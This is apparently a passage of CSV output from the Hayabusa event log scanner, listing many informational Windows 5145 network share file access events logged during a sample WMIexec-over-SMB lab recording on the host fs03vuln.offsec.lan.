10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 